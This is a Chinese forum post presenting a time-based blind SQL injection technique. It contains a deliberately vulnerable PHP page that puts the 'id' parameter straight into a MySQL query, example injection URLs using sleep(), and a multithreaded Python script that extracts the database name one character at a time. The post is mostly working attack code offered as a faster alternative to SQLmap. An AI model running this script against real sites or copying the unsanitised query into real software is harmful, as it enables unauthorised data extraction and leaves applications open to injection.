突破延时注入的时间限制-python篇
延时注入php演示源码<?php
$link= mysql_connect("localhost","root","root");
mysql_select_db("test",$link);
$sql= "select name from cms where id='{$_GET['id']}'";
echo $sql;
mysql_query($sql);
?>获取数据库长度
http://www.nvhack.com/sql/sql.php?id=1'and if(length(database()) = 4, sleep(2),1)--+
开始判断数据库字符
http://www.nvhack.com/sql/sql.php?id=1'and if(ascii(substring(database(),1,1)) = 116, sleep(2),1)--+代码如下
# -*- coding: utf-8 -*-
import requests
import threading
import datetime
# 公用函数获取数据库,版本,用户名的的长度,参数getType为,user(),database(),version(),
length = 0
def loadDataPublicLength(url,i,getType,afterstr):
if isTrue(url + ' and if(length('+ getType +') = ' + str(i)+ ', sleep(2),1)'+afterstr):
print('得到结果,长度为:'+ str(i))
global length
length = i
getName()
# 公用函数获取名字,参数getType为,user(),database(),version(),
nameStr = {}
def loadDataPublicName(url, i,getType,afterstr):
min = 32
max = 127
while True:
center = int((min + max) / 2)
if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) > ' + str(center) +', sleep(2),1)'+ afterstr):
min = center
continue
if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) < ' + str(center) +', sleep(2),1)'+ afterstr):
max = center
continue
if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) = ' + str(center) +', sleep(2),1)'+ afterstr):
global nameStr
nameStr=chr(center)
#print(nameStr)
break
print(nameStr.values())
# 判断是否正确,如果正确返回true
def isTrue(urlStr):
print(urlStr)
starttime = datetime.datetime.now() # 开始请求URL时间
re = requests.get(urlStr).content.decode('utf8')
endtime = datetime.datetime.now() # 请求完毕时间
res = (endtime - starttime).seconds
if int(res) >= 2:
return True
else:
return False
#################获取长度
def getLength():
threads1 = []
for j in range(1,20):
t = threading.Thread(target=loadDataPublicLength,args=(url,j,getType,afterstr,))
threads1.append(t)
for t1 in threads1:
#t.setDaemon(True)
t1.start()
t1.join()
################获取名字的线程,线程数取决于获取数据的长度
def getName():
threads2 = []
for j in range(1,length+1):
t = threading.Thread(target=loadDataPublicName,args=(url,j,getType,afterstr,))
threads2.append(t)
for t2 in threads2:
t2.start()
t2.join()
if __name__ == '__main__':
url = 'http://www.nvhack.com/sql/sql.php?id=1\' ' # 延时注入报错网址
afterstr = '--+' # 是否需要注释符号,不用为空
getType = 'database()'
getLength()
# 获取长度仅需几秒
# 获取名字数据库名字,要比SQLmap快很多
页:
[1]